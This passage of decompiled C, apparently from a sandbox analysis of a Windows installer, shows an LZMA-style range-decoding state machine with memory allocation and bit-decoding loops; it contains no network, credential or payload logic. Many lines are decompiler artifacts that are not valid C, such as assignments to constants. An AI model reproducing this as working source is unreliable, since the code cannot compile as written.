                                                					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                					while(1) {
                                                						L145:
                                                						 *(_t644 - 0x50) = 1;
                                                						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                						while(1) {
                                                							L149:
                                                							if( *(_t644 - 0x48) <= 0) {
                                                								goto L155;
                                                							}
                                                							L150:
                                                							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                							 *(_t644 - 0x54) = _t643;
                                                							_t569 =  *_t643;
                                                							_t635 = _t569 & 0x0000ffff;
                                                							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                							if( *(_t644 - 0xc) >= _t607) {
                                                								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                								_t628 = _t627 + 1;
                                                								 *_t643 = _t569 - (_t569 >> 5);
                                                								 *(_t644 - 0x50) = _t628;
                                                							} else {
                                                								 *(_t644 - 0x10) = _t607;
                                                								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                							}
                                                							if( *(_t644 - 0x10) >= 0x1000000) {
                                                								L148:
                                                								_t487 = _t644 - 0x48;
                                                								 *_t487 =  *(_t644 - 0x48) - 1;
                                                								L149:
                                                								if( *(_t644 - 0x48) <= 0) {
                                                									goto L155;
                                                								}
                                                								goto L150;
                                                							} else {
                                                								L154:
                                                								L146:
                                                								if( *(_t644 - 0x6c) == 0) {
                                                									L169:
                                                									 *(_t644 - 0x88) = 0x18;
                                                									L170:
                                                									_t579 = 0x22;
                                                									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                									_t539 = 0;
                                                									L172:
                                                									return _t539;
                                                								}
                                                								L147:
                                                								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                								_t484 = _t644 - 0x70;
                                                								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                								goto L148;
                                                							}
                                                							L155:
                                                							_t537 =  *(_t644 - 0x7c);
                                                							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                							while(1) {
                                                								L140:
                                                								 *(_t644 - 0x88) = _t537;
                                                								while(1) {
                                                									L1:
                                                									_t538 =  *(_t644 - 0x88);
                                                									if(_t538 > 0x1c) {
                                                										break;
                                                									}
                                                									L2:
                                                									switch( *((intOrPtr*)(_t538 * 4 +  &M00406A77))) {
                                                										case 0:
                                                											L3:
                                                											if( *(_t644 - 0x6c) == 0) {
                                                												goto L170;
                                                											}
                                                											L4:
                                                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                											_t538 =  *( *(_t644 - 0x70));
                                                											if(_t538 > 0xe1) {
                                                												goto L171;
                                                											}
                                                											L5:
                                                											_t542 = _t538 & 0x000000ff;
                                                											_push(0x2d);
                                                											asm("cdq");
                                                											_pop(_t581);
                                                											_push(9);
                                                											_pop(_t582);
                                                											_t638 = _t542 / _t581;
                                                											_t544 = _t542 % _t581 & 0x000000ff;
                                                											asm("cdq");
                                                											_t633 = _t544 % _t582 & 0x000000ff;
                                                											 *(_t644 - 0x3c) = _t633;
                                                											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                												L10:
                                                												if(_t641 == 0) {
                                                													L12:
                                                													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                													goto L15;
                                                												} else {
                                                													goto L11;
                                                												}
                                                												do {
                                                													L11:
                                                													_t641 = _t641 - 1;
                                                													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                												} while (_t641 != 0);
                                                												goto L12;
                                                											}
                                                											L6:
                                                											if( *(_t644 - 4) != 0) {
                                                												GlobalFree( *(_t644 - 4));
                                                											}
                                                											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                											 *(_t644 - 4) = _t538;
                                                											if(_t538 == 0) {
                                                												goto L171;
                                                											} else {
                                                												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                												goto L10;
                                                											}
                                                										case 1:
                                                											L13:
                                                											__eflags =  *(_t644 - 0x6c);
                                                											if( *(_t644 - 0x6c) == 0) {
                                                												L157:
                                                												 *(_t644 - 0x88) = 1;
                                                												goto L170;
                                                											}
                                                											L14:
                                                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                											_t45 = _t644 - 0x48;
                                                											 *_t45 =  *(_t644 - 0x48) + 1;
                                                											__eflags =  *_t45;
                                                											L15:
                                                											if( *(_t644 - 0x48) < 4) {
                                                												goto L13;
                                                											}
                                                											L16:
                                                											_t550 =  *(_t644 - 0x40);
                                                											if(_t550 ==  *(_t644 - 0x74)) {
                                                												L20:
                                                												 *(_t644 - 0x48) = 5;
                                                												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                												goto L23;
                                                											}
                                                											L17:
                                                											 *(_t644 - 0x74) = _t550;
                                                											if( *(_t644 - 8) != 0) {
                                                												GlobalFree( *(_t644 - 8)); // executed
                                                											}
                                                											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                											 *(_t644 - 8) = _t538;
                                                											if(_t538 == 0) {
                                                												goto L171;
                                                											} else {
                                                												goto L20;
                                                											}
                                                										case 2:
                                                											L24:
                                                											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                											 *(_t644 - 0x84) = 6;
                                                											 *(_t644 - 0x4c) = _t557;
                                                											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                											goto L132;
                                                										case 3:
                                                											L21:
                                                											__eflags =  *(_t644 - 0x6c);
                                                											if( *(_t644 - 0x6c) == 0) {
                                                												L158:
                                                												 *(_t644 - 0x88) = 3;
                                                												goto L170;
                                                											}
                                                											L22:
                                                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                											_t67 = _t644 - 0x70;
                                                											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                											__eflags =  *_t67;
                                                											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                											L23:
                                                											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                											if( *(_t644 - 0x48) != 0) {
                                                												goto L21;
                                                											}
                                                											goto L24;
                                                										case 4:
                                                											L133:
                                                											_t559 =  *_t642;
                                                											_t626 = _t559 & 0x0000ffff;
                                                											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                											if( *(_t644 - 0xc) >= _t596) {
                                                												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                												 *(_t644 - 0x40) = 1;
                                                												_t560 = _t559 - (_t559 >> 5);
                                                												__eflags = _t560;
                                                												 *_t642 = _t560;
                                                											} else {
                                                												 *(_t644 - 0x10) = _t596;
                                                												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                											}
                                                											if( *(_t644 - 0x10) >= 0x1000000) {
                                                												goto L139;
                                                											} else {
                                                												goto L137;
                                                											}
                                                										case 5:
                                                											L137:
                                                											if( *(_t644 - 0x6c) == 0) {
                                                												L168:
                                                												 *(_t644 - 0x88) = 5;
                                                												goto L170;
                                                											}
                                                											L138:
                                                											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                											L139:
                                                											_t537 =  *(_t644 - 0x84);
                                                											L140:
                                                											 *(_t644 - 0x88) = _t537;
                                                											goto L1;
                                                										case 6:
                                                											L25:
                                                											__edx = 0;
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												L36:
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) = 1;
                                                												 *(__ebp - 0x84) = 7;
                                                												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                												goto L132;
                                                											}
                                                											L26:
                                                											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                											__esi =  *(__ebp - 0x60);
                                                											__cl = 8;
                                                											__cl = 8 -  *(__ebp - 0x3c);
                                                											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                											__ecx =  *(__ebp - 0x3c);
                                                											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                											__ecx =  *(__ebp - 4);
                                                											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                											__eflags =  *(__ebp - 0x38) - 4;
                                                											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											if( *(__ebp - 0x38) >= 4) {
                                                												__eflags =  *(__ebp - 0x38) - 0xa;
                                                												if( *(__ebp - 0x38) >= 0xa) {
                                                													_t98 = __ebp - 0x38;
                                                													 *_t98 =  *(__ebp - 0x38) - 6;
                                                													__eflags =  *_t98;
                                                												} else {
                                                													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                												}
                                                											} else {
                                                												 *(__ebp - 0x38) = 0;
                                                											}
                                                											__eflags =  *(__ebp - 0x34) - __edx;
                                                											if( *(__ebp - 0x34) == __edx) {
                                                												L35:
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												goto L61;
                                                											} else {
                                                												L32:
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__ecx =  *(__ebp - 8);
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												__al =  *((intOrPtr*)(__eax + __ecx));
                                                												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                												goto L41;
                                                											}
                                                										case 7:
                                                											L66:
                                                											__eflags =  *(__ebp - 0x40) - 1;
                                                											if( *(__ebp - 0x40) != 1) {
                                                												L68:
                                                												__eax =  *(__ebp - 0x24);
                                                												 *(__ebp - 0x80) = 0x16;
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x28);
                                                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                												__eax =  *(__ebp - 0x2c);
                                                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                												__al = __al & 0x000000fd;
                                                												__eax = (__eflags >= 0) - 1 + 0xa;
                                                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                												__eax =  *(__ebp - 4);
                                                												__eax =  *(__ebp - 4) + 0x664;
                                                												__eflags = __eax;
                                                												 *(__ebp - 0x58) = __eax;
                                                												goto L69;
                                                											}
                                                											L67:
                                                											__eax =  *(__ebp - 4);
                                                											__ecx =  *(__ebp - 0x38);
                                                											 *(__ebp - 0x84) = 8;
                                                											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                											goto L132;
                                                										case 8:
                                                											L70:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 0xa;
                                                												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                											} else {
                                                												__eax =  *(__ebp - 0x38);
                                                												__ecx =  *(__ebp - 4);
                                                												__eax =  *(__ebp - 0x38) + 0xf;
                                                												 *(__ebp - 0x84) = 9;
                                                												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                											}
                                                											goto L132;
                                                										case 9:
                                                											L73:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												goto L90;
                                                											}
                                                											L74:
                                                											__eflags =  *(__ebp - 0x60);
                                                											if( *(__ebp - 0x60) == 0) {
                                                												goto L171;
                                                											}
                                                											L75:
                                                											__eax = 0;
                                                											__eflags =  *(__ebp - 0x38) - 7;
                                                											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                											__eflags = _t259;
                                                											0 | _t259 = _t259 + _t259 + 9;
                                                											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                											goto L76;
                                                										case 0xa:
                                                											L82:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												L84:
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 0xb;
                                                												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                												goto L132;
                                                											}
                                                											L83:
                                                											__eax =  *(__ebp - 0x28);
                                                											goto L89;
                                                										case 0xb:
                                                											L85:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__ecx =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x20);
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                											} else {
                                                												__eax =  *(__ebp - 0x24);
                                                											}
                                                											__ecx =  *(__ebp - 0x28);
                                                											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                											L89:
                                                											__ecx =  *(__ebp - 0x2c);
                                                											 *(__ebp - 0x2c) = __eax;
                                                											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                											L90:
                                                											__eax =  *(__ebp - 4);
                                                											 *(__ebp - 0x80) = 0x15;
                                                											__eax =  *(__ebp - 4) + 0xa68;
                                                											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                											goto L69;
                                                										case 0xc:
                                                											L99:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												L164:
                                                												 *(__ebp - 0x88) = 0xc;
                                                												goto L170;
                                                											}
                                                											L100:
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t334 = __ebp - 0x70;
                                                											 *_t334 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t334;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											__eax =  *(__ebp - 0x2c);
                                                											goto L101;
                                                										case 0xd:
                                                											L37:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												L159:
                                                												 *(__ebp - 0x88) = 0xd;
                                                												goto L170;
                                                											}
                                                											L38:
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t122 = __ebp - 0x70;
                                                											 *_t122 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t122;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L39:
                                                											__eax =  *(__ebp - 0x40);
                                                											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                												goto L48;
                                                											}
                                                											L40:
                                                											__eflags = __ebx - 0x100;
                                                											if(__ebx >= 0x100) {
                                                												goto L54;
                                                											}
                                                											L41:
                                                											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                											 *(__ebp - 0x48) = __eax;
                                                											__eax = __eax + 1;
                                                											__eax = __eax << 8;
                                                											__eax = __eax + __ebx;
                                                											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                											__ax =  *__esi;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__edx = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												 *(__ebp - 0x40) = 1;
                                                												__cx = __ax >> 5;
                                                												__eflags = __eax;
                                                												__ebx = __ebx + __ebx + 1;
                                                												 *__esi = __ax;
                                                											} else {
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edx;
                                                												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                												__ebx = __ebx + __ebx;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											 *(__ebp - 0x44) = __ebx;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L39;
                                                											} else {
                                                												L45:
                                                												goto L37;
                                                											}
                                                										case 0xe:
                                                											L46:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												L160:
                                                												 *(__ebp - 0x88) = 0xe;
                                                												goto L170;
                                                											}
                                                											L47:
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t156 = __ebp - 0x70;
                                                											 *_t156 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t156;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											while(1) {
                                                												L48:
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													break;
                                                												}
                                                												L49:
                                                												__eax =  *(__ebp - 0x58);
                                                												__edx = __ebx + __ebx;
                                                												__ecx =  *(__ebp - 0x10);
                                                												__esi = __edx + __eax;
                                                												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													_t170 = __edx + 1; // 0x1
                                                													__ebx = _t170;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													continue;
                                                												} else {
                                                													L53:
                                                													goto L46;
                                                												}
                                                											}
                                                											L54:
                                                											_t173 = __ebp - 0x34;
                                                											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                											__eflags =  *_t173;
                                                											goto L55;
                                                										case 0xf:
                                                											L58:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												L161:
                                                												 *(__ebp - 0x88) = 0xf;
                                                												goto L170;
                                                											}
                                                											L59:
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t203 = __ebp - 0x70;
                                                											 *_t203 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t203;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L60:
                                                											__eflags = __ebx - 0x100;
                                                											if(__ebx >= 0x100) {
                                                												L55:
                                                												__al =  *(__ebp - 0x44);
                                                												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                												goto L56;
                                                											}
                                                											L61:
                                                											__eax =  *(__ebp - 0x58);
                                                											__edx = __ebx + __ebx;
                                                											__ecx =  *(__ebp - 0x10);
                                                											__esi = __edx + __eax;
                                                											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                											__ax =  *__esi;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__edi = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												_t217 = __edx + 1; // 0x1
                                                												__ebx = _t217;
                                                												__cx = __ax >> 5;
                                                												__eflags = __eax;
                                                												 *__esi = __ax;
                                                											} else {
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edi;
                                                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                												__ebx = __ebx + __ebx;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											 *(__ebp - 0x44) = __ebx;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L60;
                                                											} else {
                                                												L65:
                                                												goto L58;
                                                											}
                                                										case 0x10:
                                                											L109:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												L165:
                                                												 *(__ebp - 0x88) = 0x10;
                                                												goto L170;
                                                											}
                                                											L110:
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t365 = __ebp - 0x70;
                                                											 *_t365 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t365;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											goto L111;
                                                										case 0x11:
                                                											L69:
                                                											__esi =  *(__ebp - 0x58);
                                                											 *(__ebp - 0x84) = 0x12;
                                                											goto L132;
                                                										case 0x12:
                                                											L128:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												L131:
                                                												__eax =  *(__ebp - 0x58);
                                                												 *(__ebp - 0x84) = 0x13;
                                                												__esi =  *(__ebp - 0x58) + 2;
                                                												L132:
                                                												 *(_t644 - 0x54) = _t642;
                                                												goto L133;
                                                											}
                                                											L129:
                                                											__eax =  *(__ebp - 0x4c);
                                                											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax =  *(__ebp - 0x4c) << 4;
                                                											__eflags = __eax;
                                                											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                											goto L130;
                                                										case 0x13:
                                                											L141:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												L143:
                                                												_t469 = __ebp - 0x58;
                                                												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                												__eflags =  *_t469;
                                                												 *(__ebp - 0x30) = 0x10;
                                                												 *(__ebp - 0x40) = 8;
                                                												L144:
                                                												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                												L145:
                                                												 *(_t644 - 0x50) = 1;
                                                												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                												goto L149;
                                                											}
                                                											L142:
                                                											__eax =  *(__ebp - 0x4c);
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax =  *(__ebp - 0x4c) << 4;
                                                											 *(__ebp - 0x30) = 8;
                                                											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                											L130:
                                                											 *(__ebp - 0x58) = __eax;
                                                											 *(__ebp - 0x40) = 3;
                                                											goto L144;
                                                										case 0x14:
                                                											L156:
                                                											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                											__eax =  *(__ebp - 0x80);
                                                											while(1) {
                                                												L140:
                                                												 *(_t644 - 0x88) = _t537;
                                                												goto L1;
                                                											}
                                                										case 0x15:
                                                											L91:
                                                											__eax = 0;
                                                											__eflags =  *(__ebp - 0x38) - 7;
                                                											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                											__al = __al & 0x000000fd;
                                                											__eax = (__eflags >= 0) - 1 + 0xb;
                                                											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                											goto L120;
                                                										case 0x16:
                                                											goto L0;
